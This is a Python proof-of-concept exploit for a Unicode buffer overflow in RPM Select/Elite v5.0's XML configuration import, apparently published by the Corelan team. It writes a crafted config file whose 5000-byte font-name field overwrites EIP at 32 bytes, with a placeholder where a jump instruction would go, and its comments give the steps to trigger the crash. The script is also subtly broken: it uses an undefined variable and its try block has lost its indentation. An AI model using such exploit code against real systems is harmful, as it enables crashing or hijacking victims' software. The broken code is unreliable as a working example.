|
#!/usr/bin/python
# ####################################################################
# RPM Select/Elite v5.0 (.xml config parsing) unicode buffer overflow PoC
# Found by: mr_me - http://net-ninja.net/
# Homepage: http://lpd.brooksnet.com/
# Download: http://www.brooksnet.com/download-rpmselect
# Tested on: Windows XP SP3
# Advisory: http://www.corelan.be:8800/advisories.php?id=10-024
# Greetz: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# ####################################################################
# Notes: We overwrite EIP @ 32 bytes in, and the function doesnt copy
# enough of our string to hit SEH. However modules are compiled with
# SAFESEH anyway. Combine that with unicode and the printable ascii
# limitations, we are presented with to much of a hurdle.
# ####################################################################
# How to trigger the crash:
# file -> import configuration
# Click on the queue name, then click on the imported transform
# Click 'modify transform' and b00m!
# ####################################################################
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes.
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages.
header1 = """<RPM version="5.0.70.6">
<Queues>
<Queue>
<description>lol</description>
<seqno>0</seqno>
<enabled>1</enabled>
<actions>1</actions>
<held>0</held>
<running>0</running>
<name>mr_mes print queue</name>
<Transforms>
<Transform>
<LineWrap>0</LineWrap>
<lfPitchAndFamily>48</lfPitchAndFamily>
<lfOrientation>0</lfOrientation>
<lfFaceName>
"""
header2 = """</lfFaceName>
<lfWidth>0</lfWidth>
<UseCharsPerInch>0</UseCharsPerInch>
<lfItalic>0</lfItalic>
<UseLinesPerPage>0</UseLinesPerPage>
<lfEscapement>0</lfEscapement>
<LinesPerInch>6.000000</LinesPerInch>
<type>24</type>
<LeftMargin>0.500000</LeftMargin>
<PortraitMax>90</PortraitMax>
<CharsPerInch>10.000000</CharsPerInch>
<CharsPerLine>80</CharsPerLine>
<TopMargin>0.500000</TopMargin>
<LinesPerPage>60</LinesPerPage>
<lfQuality>2</lfQuality>
<lfStrikeOut>0</lfStrikeOut>
<lfWeight>400</lfWeight>
<FontSize>12</FontSize>
<lfUnderline>0</lfUnderline>
<BottomMargin>0.500000</BottomMargin>
<Orientation>portrait</Orientation>
<InputFormat>1252</InputFormat>
<CalcLayout>false</CalcLayout>
<UseLinesPerInch>1</UseLinesPerInch>
<RightMargin>0.500000</RightMargin>
<CtrlStrip>1</CtrlStrip>
<UseCharsPerLine>0</UseCharsPerLine>
<lfCharSet>1</lfCharSet>
<lfOutPrecision>0</lfOutPrecision>
<lfClipPrecision>0</lfClipPrecision>
<SuppressBlankPage>1</SuppressBlankPage>
<lfHeight>-16</lfHeight>
</Transform>
</Transforms>
<Jobs />
</Queue>
</Queues>
<Hosts />
</RPM>
"""
payload = "\x41" * 32
payload += "\x42\x42" # your "jmp to esp" instruction should go here
payload += "\x44" * (5000-len(buffer))
exploit = header1.rstrip() + payload.rstrip() + header2.rstrip()
try:
f=open("cst-rpm-config.xml",'w')
f.write(exploit)
f.close()
print "[+] File created successfully !"
except:
print "[-] Error cannot write xml file to system\n"
|
推荐
评论(0条)
